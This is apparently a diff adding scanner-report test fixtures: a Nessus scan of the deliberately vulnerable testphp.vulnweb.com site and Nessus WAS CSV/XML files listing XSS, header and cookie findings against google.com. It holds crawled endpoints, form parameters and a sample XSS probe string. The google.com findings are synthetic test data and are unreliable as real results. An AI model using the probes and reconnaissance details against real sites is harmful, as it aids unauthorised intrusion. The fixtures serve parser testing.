- http://testphp.vulnweb.com/CVS/Root + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2/ + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-1.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-2.html + - http://testphp.vulnweb.com/Mod_Rewrite_Shop/RateProduct-3.html + - http://testphp.vulnweb.com/Templates/ + - http://testphp.vulnweb.com/Templates/main_dynamic_template.dwt.php + - http://testphp.vulnweb.com/admin/ + - http://testphp.vulnweb.com/admin/create.sql + - http://testphp.vulnweb.com/artists.php + - http://testphp.vulnweb.com/cart.php + - http://testphp.vulnweb.com/categories.php + - http://testphp.vulnweb.com/disclaimer.php + - http://testphp.vulnweb.com/guestbook.php + - http://testphp.vulnweb.com/hpp/ + - http://testphp.vulnweb.com/images/ + - http://testphp.vulnweb.com/images/logo.gif + - http://testphp.vulnweb.com/images/remark.gif + - http://testphp.vulnweb.com/index.php + - http://testphp.vulnweb.com/listproducts.php + - http://testphp.vulnweb.com/login.php + - http://testphp.vulnweb.com/search.php + - http://testphp.vulnweb.com/secured/ + - http://testphp.vulnweb.com/secured/newuser.php + - http://testphp.vulnweb.com/secured/style.css + - http://testphp.vulnweb.com/signup.php + - http://testphp.vulnweb.com/style.css + + Attached is a copy of the sitemap file. + + + e48dbcc1e83a31720de4adbe039409a9 + + + + Nessus gathered HREF links to external sites by crawling the remote web server. + + webmirror_ext_URL.nasl + 2011/08/19 + External URLs + 2010/10/04 + remote + None + $Revision: 1.3 $ + n/a + Links to external sites were gathered. + + 7 external URLs were gathered on this web server : + URL... - Seen on... + + + http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html - /hpp/ + http://www.acunetix.com - / + http://www.eclectasy.com/Fractal-Explorer/index.html - / + https://www.acunetix.com/ - / + https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/ - + / + https://www.acunetix.com/vulnerability-scanner/ - / + https://www.acunetix.com/vulnerability-scanner/php-security-scanner/ - / + + + + Nessus harvested HREF mailto: links and extracted email addresses by crawling the remote + web server. + + webmirror_mailto.nasl + 2018/05/24 + Web Server Harvested Email Addresses + 2010/10/04 + remote + None + 1.7 + n/a + Email addresses were harvested from the web server. + + + The following email address has been gathered : + + + - 'wvs@acunetix.com', referenced from : + /search.php + /listproducts.php + /index.php + /artists.php + /categories.php + /signup.php + /disclaimer.php + / + /Templates/main_dynamic_template.dwt.php + /cart.php + /guestbook.php + /login.php + + + + 2.6 + CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N + 522 + 523 + 718 + 724 + 928 + 930 + The remote web server contains several HTML form fields containing an input of type 'password' + which transmit their information to a remote web server in cleartext. + + An attacker eavesdropping the traffic between web browser and server may obtain logins and passwords + of valid users. + + www_clear_text_passwords.nasl + 2016/11/29 + Web Server Transmits Cleartext Credentials + 2007/09/28 + remote + Low + $Revision: 1.17 $ + Make sure that every sensitive form transmits content over HTTPS. + The remote web server might transmit credentials in cleartext. + CWE:522 + CWE:523 + CWE:718 + CWE:724 + CWE:928 + CWE:930 + Page : /login.php + Destination Page: /userinfo.php + + Page : /signup.php + Destination Page: /secured/newuser.php + + + + + This plugin makes a mirror of the remote website(s) and extracts the list of CGIs that are + used by the remote host. + + It is suggested that you change the number of pages to mirror in the 'Options' section of + the client. + + webmirror3.nbin + 2022/02/14 + Web mirroring + 2001/05/04 + remote + None + 3.84 + n/a + Nessus can crawl the remote website. + + Webmirror performed 174 queries in 89s (1.0955 queries per second) + + The following CGIs have been discovered : + + + + CGI : /search.php + Methods : POST + Argument : goButton + Value: go + Argument : searchFor + Argument : test + Value: query + + + + CGI : /listproducts.php + Methods : GET + Argument : cat + Value: 4 + + + + CGI : /artists.php + Methods : GET + Argument : artist + Value: 3 + + + + CGI : /comment.php + Methods : GET + Argument : aid + Value: 3 + + + + CGI : /guestbook.php + Methods : POST + Argument : name + Value: anonymous user + Argument : submit + Value: add message + Argument : text + + + + CGI : /AJAX/index.php/.php + Methods : GET + Argument : id + + + + CGI : /userinfo.php + Methods : POST + Argument : pass + Argument : uname + + + + CGI : /hpp/ + Methods : GET + Argument : pp + Value: 12 + + + + CGI : /AJAX/index.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/.php + Methods : GET + Argument : id + + + + CGI : /secured/newuser.php + Methods : POST + Argument : signup + Value: signup + Argument : uaddress + Argument : ucc + Argument : uemail + Argument : upass + Argument : upass2 + Argument : uphone + Argument : urname + Argument : uuname + + + + CGI : /AJAX/index.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/.php/showxml.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/.php/showxml.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/showxml.php/.php/.php + Methods : GET + Argument : id + + + + CGI : /AJAX/index.php/showxml.php/showxml.php/showxml.php/showxml.php/.php + Methods : GET + Argument : id + + Directory index found at /admin/ + Directory index found at /images/ + Directory index found at /Templates/ + Directory index found at /CVS/ + + + + This plugin attempts to determine the presence of various common directories on the remote + web server. By sending a request for a directory, the web server response code indicates if it is a + valid directory or not. + + DDI_Directory_Scanner.nasl + OWASP-CM-006 + 2021/08/17 + Web Server Directory Enumeration + 2002/06/26 + remote + None + 1.114 + http://projects.webappsec.org/w/page/13246953/Predictable%20Resource%20Location + n/a + It is possible to enumerate directories on the web server. + OWASP:OWASP-CM-006 + + The following directories were discovered: + /admin, /cgi-bin, /secured, /CVS, /Templates, /images + + While this is not, in and of itself, a bug, you should manually inspect + these directories to ensure that they are in compliance with company + security standards + + + + It was possible to identify the remote service by its banner or by looking at the error + message it sends when it receives a 'HELP' request. + + find_service2.nasl + 2018/11/26 + Service Detection (HELP Request) + 2002/11/18 + remote + None + 1.317 + n/a + The remote service could be identified. + A web server seems to be running on this port. + + + The remote host implements TCP timestamps, as defined by RFC1323. A side effect of this + feature is that the uptime of the remote host can sometimes be computed. + + tcp_timestamps.nasl + 2019/03/06 + TCP/IP Timestamps Supported + 2007/05/16 + remote + None + 1.21 + http://www.ietf.org/rfc/rfc1323.txt + n/a + The remote service implements TCP timestamps. + + + CVE-1999-0524 + 0.0 + CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + 0.0 + CVE-1999-0524 + CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:N + 200 + The remote host answers to an ICMP timestamp request. This allows an attacker to know the + date that is set on the targeted machine, which may assist an unauthenticated, remote attacker in + defeating time-based authentication protocols. + + Timestamps returned from machines running Windows Vista / 7 / 2008 / 2008 R2 are deliberately + incorrect, but usually within 1000 seconds of the actual system time. + + icmp_timestamp.nasl + 2019/10/04 + ICMP Timestamp Request Remote Date Disclosure + 1999/08/01 + remote + None + 1.48 + Filter out the ICMP timestamp requests (13), and the outgoing ICMP timestamp replies (14). + + It is possible to determine the exact time set on the remote host. + 1995/01/01 + CWE:200 + The difference between the local and remote clocks is 1 second. + + + + Nessus was able to resolve the fully qualified domain name (FQDN) of the remote host. + + fqdn.nasl + 2017/04/14 + Host Fully Qualified Domain Name (FQDN) Resolution + 2004/02/11 + remote + None + $Revision: 1.16 $ + n/a + It was possible to resolve the name of the remote host. + + 44.228.249.3 resolves as ec2-44-228-249-3.us-west-2.compute.amazonaws.com. + + + + This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even + against a firewalled target. + + Note that SYN scans are less intrusive than TCP (full connect) scans against broken services, but + they might cause problems for less robust firewalls and also leave unclosed connections on the + remote target, if the network is loaded. + + nessus_syn_scanner.nbin + 2022/02/14 + Nessus SYN scanner + 2009/02/04 + remote + None + 1.43 + Protect your target with an IP filter. + It is possible to determine which TCP ports are open. + Port 80/tcp was found to be open + + + + diff --git a/unittests/scans/nessus_was/nessus_was_many_vuln.csv b/unittests/scans/nessus_was/nessus_was_many_vuln.csv new file mode 100644 index 00000000000..0f9a60ff9a9 --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_many_vuln.csv @@ -0,0 +1,117 @@ +Plugin ID,CVE,CVSS,CVSSv3,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output +98104,,7.5,7.1,high,google.com,http,,Cross-Site Scripting (XSS),Cross-Site Scripting (XSS),"Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. + +Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation. + +If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS). + +Scanner has discovered that it is possible to insert script content directly into HTML element content.","To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. +Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. +Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: +* `&` * `<` * `>` * `'` * `'` * `/` +An example of HTML entity encoding is converting `<` to `<`. +Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: +1. Directly in a script. 2. Inside an HTML comment. 3. In an attribute name. 4. In a tag name. 5. Directly in CSS. +Each of these locations have their own form of escaping and filtering. +_Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._","http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting + +https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet","Vulnerability has been detected on URL 'http://google.com/search.jsp' by exploiting 'form' element named 'query' and injecting following payload: + + | ()""&%1'-;' + +To confirm the presence of the vulnerability, this proof has been identified in the target response: + + | " +112491,,,,info,google.com,http,,SSL/TLS Certificate Information,SSL/TLS Certificate Information,This plugin displays information about the X.509 certificate extracted from the HTTPS connection.,,," + +Certificate 1 +-------------- +Common Name: google.com +Alternative Names: google.com +Issuer: N/A +Valid from: 2020-05-22 00:00:00 UTC +Valid until: 2022-05-22 23:59:59 UTC (expires in 1 year, 2 months, 1 week, 3 days) +Validity Period: 730 days +Key: RSA 2048-bit +Signature: sha256WithRSAEncryption + +Certificate 2 +-------------- +Common Name: N/A +Issuer: N/A +Valid from: 2019-03-12 00:00:00 UTC +Valid until: 2028-12-31 23:59:59 UTC (expires in 7 years, 9 months, 2 weeks, 6 days) +Validity Period: 3582 days +Key: RSA 4096-bit +Signature: sha384WithRSAEncryption + +Certificate 3 +-------------- +Common Name: N/A +Issuer: N/A +Valid from: 2004-01-01 00:00:00 UTC +Valid until: 2028-12-31 23:59:59 UTC (expires in 7 years, 9 months, 2 weeks, 6 days) +Validity Period: 9131 days +Key: RSA 2048-bit +Signature: sha1WithRSAEncryption" +98060,,2.6,3.1,low,google.com,http,,Missing 'X-Frame-Options' Header,Missing 'X-Frame-Options' Header,"Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. + +The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. + +The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites.",Configure your web server to include an `X-Frame-Options` header.,"https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options + +http://tools.ietf.org/html/rfc7034 + +https://www.owasp.org/index.php/Clickjacking",Page http://google.com/ has no X-Frame-Option header defined +115540,,2.6,3.1,low,google.com,http,,Cookie Without SameSite Flag Detected,Cookie Without SameSite Flag Detected,"SameSite is an attribute which can be set on a cookie to instruct the web browser if this cookie can be sent along with cross-site requests to help prevent Cross-Site Request Forgery (CSRF) attacks. + +The attribute has three possible values : + + - Strict : the cookie will only be sent in a first-party context, thus preventing cross-site requests initiated from third-party websites to include it. + + - Lax : the cookie is allowed to be sent in GET cross-site requests initiated by the top-level navigation from third-party websites. For example, following an hypertext link from the external website will make the request include the cookie. + + - None : the cookie is explicitly set to be sent by the browser in any context. + +The scanner identified the lack of SameSite attribute on cookies set by the application or a misconfiguration.","Web browsers default behavior may differ when processing cookies in a cross-site context, making the final decision to send the cookie in this context unpredictable. The SameSite attribute should be set in every cookie to enforce the expected result by developers. When using the 'None' attribute value, ensure that the cookie is also set with the 'Secure' flag.","https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSite + +https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attribute + +https://web.dev/samesite-cookies-explained + +https://blog.chromium.org/2019/10/developers-get-ready-for-new.html",http://google.com/ returned a cookie named 'JSESSIONID' which does not have the 'SameSite' attribute set. +112551,,2.6,3.1,low,google.com,http,,Missing Content Security Policy,Missing Content Security Policy,"Content Security Policy (CSP) is a web security standard that helps to mitigate attacks like cross-site scripting (XSS), clickjacking or mixed content issues. CSP provides mechanisms to websites to restrict content that browsers will be allowed to load. + +No CSP header has been detected on this host. This URL is flagged as an specific example.",Configure Content Security Policy on your website by adding 'Content-Security-Policy' HTTP header or meta tag http-equiv='Content-Security-Policy'.,"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy + +https://developers.google.com/web/fundamentals/security/csp/ + +https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP + +https://csp-evaluator.withgoogle.com/ + +https://content-security-policy.com/",http://google.com/ +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, +,,,,,,,,,,,,, \ No newline at end of file diff --git a/unittests/scans/nessus_was/nessus_was_many_vuln.xml b/unittests/scans/nessus_was/nessus_was_many_vuln.xml new file mode 100644 index 00000000000..307f568cb0d --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_many_vuln.xml @@ -0,0 +1,122 @@ +905a5ba3-6db3-4f80-b550-1c2316e23cc619257b6d-6ad2-4e1e-b710-dcfb12e720f7WAS/%vfalsetext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8en-US,en;q=0.520false5000000102truetruetruetruetruetruetruetruefalsefalsetrueall100false\5true510logoutjs,css,png,jpeg,gif,pdf,csv,svn-base,svg,jpg,ico,woff,woff2500050030000disabletrue100253601600true120002:00:00truelimitedhttp://rfi.nessus.org/rfi.txtfalsecloudnessis_was_many_vuln +http://google.com/web_application2021-03-12T12:34:30.12031+00:002021-03-12T14:35:34.341269+00:00 + + +Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. + +Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation. + +If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS). + +Scanner has discovered that it is possible to insert script content directly into HTML element content. + +2017-03-31T00:00:00+00:002020-01-14T00:00:00+00:00 + +Vulnerability has been detected on URL 'http://google.com/search.jsp' by exploiting 'form' element named 'query' and injecting following payload: + +| ()"&%1'-;<xss_9676200>' + +To confirm the presence of the vulnerability, this proof has been identified in the target response: + +| <xss_9676200> + +Cross-Site Scripting (XSS) + +To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. +Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. +Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: +* `&` * `<` * `>` * `'` * `'` * `/` +An example of HTML entity encoding is converting `<` to `&lt;`. +Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: +1. Directly in a script. 2. Inside an HTML comment. 3. In an attribute name. 4. In a tag name. 5. Directly in CSS. +Each of these locations have their own form of escaping and filtering. +_Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._ + +high7.57.1 +http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scriptinghttps://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet +WASC:Cross-Site ScriptingCWE:79OWASP_API:2019-API7OWASP:2017-A7OWASP:2010-A2OWASP:2013-A3 + + + +This plugin displays information about the X.509 certificate extracted from the HTTPS connection. + +2018-10-03T00:00:00+00:002020-10-02T00:00:00+00:00 + +Certificate 1 +-------------- +Common Name: google.com +Alternative Names: google.com +Issuer: N/A +Valid from: 2020-05-22 00:00:00 UTC +Valid until: 2022-05-22 23:59:59 UTC (expires in 1 year, 2 months, 1 week, 3 days) +Validity Period: 730 days +Key: RSA 2048-bit +Signature: sha256WithRSAEncryption + +Certificate 2 +-------------- +Common Name: N/A +Issuer: N/A +Valid from: 2019-03-12 00:00:00 UTC +Valid until: 2028-12-31 23:59:59 UTC (expires in 7 years, 9 months, 2 weeks, 6 days) +Validity Period: 3582 days +Key: RSA 4096-bit +Signature: sha384WithRSAEncryption + +SSL/TLS Certificate Information + +info + + + +Clickjacking (User Interface redress attack, UI redress attack, UI redressing) is a malicious technique of tricking a Web user into clicking on something different from what the user perceives they are clicking on, thus potentially revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages. + +The server didn't return an `X-Frame-Options` header which means that this website could be at risk of a clickjacking attack. + +The `X-Frame-Options` HTTP response header can be used to indicate whether or not a browser should be allowed to render a page inside a frame or iframe. Sites can use this to avoid clickjacking attacks, by ensuring that their content is not embedded into other sites. + +2017-03-31T00:00:00+00:002017-10-16T00:00:00+00:00 +Page http://google.com/ has no X-Frame-Option header defined +Missing 'X-Frame-Options' Header +Configure your web server to include an `X-Frame-Options` header. +low2.63.1 +https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Optionshttp://tools.ietf.org/html/rfc7034https://www.owasp.org/index.php/Clickjacking +WASC:Application MisconfigurationCWE:693OWASP:2013-A5OWASP:2017-A6OWASP:2010-A6 + + + +SameSite is an attribute which can be set on a cookie to instruct the web browser if this cookie can be sent along with cross-site requests to help prevent Cross-Site Request Forgery (CSRF) attacks. + +The attribute has three possible values : + +- Strict : the cookie will only be sent in a first-party context, thus preventing cross-site requests initiated from third-party websites to include it. + +- Lax : the cookie is allowed to be sent in GET cross-site requests initiated by the top-level navigation from third-party websites. For example, following an hypertext link from the external website will make the request include the cookie. + +- None : the cookie is explicitly set to be sent by the browser in any context. + +The scanner identified the lack of SameSite attribute on cookies set by the application or a misconfiguration. + +2018-12-14T00:00:00+00:002020-06-16T00:00:00+00:00 +http://google.com/ returned a cookie named 'JSESSIONID' which does not have the 'SameSite' attribute set. +Cookie Without SameSite Flag Detected + +Web browsers default behavior may differ when processing cookies in a cross-site context, making the final decision to send the cookie in this context unpredictable. The SameSite attribute should be set in every cookie to enforce the expected result by developers. When using the 'None' attribute value, ensure that the cookie is also set with the 'Secure' flag. + +low2.63.1 +https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie/SameSitehttps://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attributehttps://web.dev/samesite-cookies-explainedhttps://blog.chromium.org/2019/10/developers-get-ready-for-new.html +WASC:Cross-Site Request ForgeryCWE:352OWASP:2010-A5OWASP:2013-A8 + + + +Content Security Policy (CSP) is a web security standard that helps to mitigate attacks like cross-site scripting (XSS), clickjacking or mixed content issues. CSP provides mechanisms to websites to restrict content that browsers will be allowed to load. + +No CSP header has been detected on this host. This URL is flagged as an specific example. + +2019-02-14T00:00:00+00:002019-02-14T00:00:00+00:00 +http://google.com/ +Missing Content Security Policy +Configure Content Security Policy on your website by adding 'Content-Security-Policy' HTTP header or meta tag http-equiv='Content-Security-Policy'. +low2.63.1 +https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policyhttps://developers.google.com/web/fundamentals/security/csp/https://developer.mozilla.org/en-US/docs/Web/HTTP/CSPhttps://csp-evaluator.withgoogle.com/https://content-security-policy.com/ +WASC:Application MisconfigurationCWE:693OWASP:2010-A6OWASP_API:2019-API7OWASP:2013-A5OWASP:2017-A6 \ No newline at end of file diff --git a/unittests/scans/nessus_was/nessus_was_no_vuln.csv b/unittests/scans/nessus_was/nessus_was_no_vuln.csv new file mode 100644 index 00000000000..bf4a8a45af4 --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_no_vuln.csv @@ -0,0 +1 @@ +Plugin ID,CVE,CVSS,CVSSv3,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output \ No newline at end of file diff --git a/unittests/scans/nessus_was/nessus_was_no_vuln.xml b/unittests/scans/nessus_was/nessus_was_no_vuln.xml new file mode 100644 index 00000000000..a6518905ea1 --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_no_vuln.xml @@ -0,0 +1,2 @@ +905a5ba3-6db3-4f80-b550-1c2316e23cc619257b6d-6ad2-4e1e-b710-dcfb12e720f7WAS/%vfalsetext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8en-US,en;q=0.520false5000000102truetruetruetruetruetruetruetruefalsefalsetrueall100false\5true510logoutjs,css,png,jpeg,gif,pdf,csv,svn-base,svg,jpg,ico,woff,woff2500050030000disabletrue100253601600true120002:00:00truelimitedhttp://rfi.nessus.org/rfi.txtfalsecloudnessis_was_many_vuln +http://google.com/web_application2021-03-12T12:34:30.12031+00:002021-03-12T14:35:34.341269+00:00 \ No newline at end of file diff --git a/unittests/scans/nessus_was/nessus_was_one_vuln.csv b/unittests/scans/nessus_was/nessus_was_one_vuln.csv new file mode 100644 index 00000000000..cb6c3400bb5 --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_one_vuln.csv @@ -0,0 +1,24 @@ +Plugin ID,CVE,CVSS,CVSSv3,Risk,Host,Protocol,Port,Name,Synopsis,Description,Solution,See Also,Plugin Output +98104,,7.5,7.1,high,google.com,http,,Cross-Site Scripting (XSS),Cross-Site Scripting (XSS),"Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. + +Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation. + +If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS). + +Scanner has discovered that it is possible to insert script content directly into HTML element content.","To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. +Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. +Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: +* `&` * `<` * `>` * `'` * `'` * `/` +An example of HTML entity encoding is converting `<` to `<`. +Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: +1. Directly in a script. 2. Inside an HTML comment. 3. In an attribute name. 4. In a tag name. 5. Directly in CSS. +Each of these locations have their own form of escaping and filtering. +_Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._","http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting + +https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet","Vulnerability has been detected on URL 'http:google.com/search.jsp' by exploiting 'form' element named 'query' and injecting following payload: + + | ()""&%1'-;' + +To confirm the presence of the vulnerability, this proof has been identified in the target response: + + | " \ No newline at end of file diff --git a/unittests/scans/nessus_was/nessus_was_one_vuln.xml b/unittests/scans/nessus_was/nessus_was_one_vuln.xml new file mode 100644 index 00000000000..8ffbba53618 --- /dev/null +++ b/unittests/scans/nessus_was/nessus_was_one_vuln.xml @@ -0,0 +1,37 @@ +905a5ba3-6db3-4f80-b550-1c2316e23cc619257b6d-6ad2-4e1e-b710-dcfb12e720f7WAS/%vfalsetext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8en-US,en;q=0.520false5000000102truetruetruetruetruetruetruetruefalsefalsetrueall100false\5true510logoutjs,css,png,jpeg,gif,pdf,csv,svn-base,svg,jpg,ico,woff,woff2500050030000disabletrue100253601600true120002:00:00truelimitedhttp://rfi.nessus.org/rfi.txtfalsecloudnessis_was_many_vuln +http://google.com/web_application2021-03-12T12:34:30.12031+00:002021-03-12T14:35:34.341269+00:00 + + +Client-side scripts are used extensively by modern web applications. They perform from simple functions (such as the formatting of text) up to full manipulation of client-side data and Operating System interaction. + +Cross Site Scripting (XSS) allows clients to inject scripts into a request and have the server return the script to the client in the response. This occurs because the application is taking untrusted data (in this example, from the client) and reusing it without performing any validation or sanitisation. + +If the injected script is returned immediately this is known as reflected XSS. If the injected script is stored by the server and returned to any client visiting the affected page, then this is known as persistent XSS (also stored XSS). + +Scanner has discovered that it is possible to insert script content directly into HTML element content. + +2017-03-31T00:00:00+00:002020-01-14T00:00:00+00:00 + +Vulnerability has been detected on URL 'http://google.com/search.jsp' by exploiting 'form' element named 'query' and injecting following payload: + +| ()"&%1'-;<xss_9676200>' + +To confirm the presence of the vulnerability, this proof has been identified in the target response: + +| <xss_9676200> + +Cross-Site Scripting (XSS) + +To remedy XSS vulnerabilities, it is important to never use untrusted or unfiltered data within the code of a HTML page. +Untrusted data can originate not only form the client but potentially a third party or previously uploaded file etc. +Filtering of untrusted data typically involves converting special characters to their HTML entity encoded counterparts (however, other methods do exist, see references). These special characters include: +* `&` * `<` * `>` * `'` * `'` * `/` +An example of HTML entity encoding is converting `<` to `&lt;`. +Although it is possible to filter untrusted input, there are five locations within an HTML page where untrusted input (even if it has been filtered) should never be placed: +1. Directly in a script. 2. Inside an HTML comment. 3. In an attribute name. 4. In a tag name. 5. Directly in CSS. +Each of these locations have their own form of escaping and filtering. +_Because many browsers attempt to implement XSS protection, any manual verification of this finding should be conducted using multiple different browsers and browser versions._ + +high7.57.1 +http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scriptinghttps://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet +WASC:Cross-Site 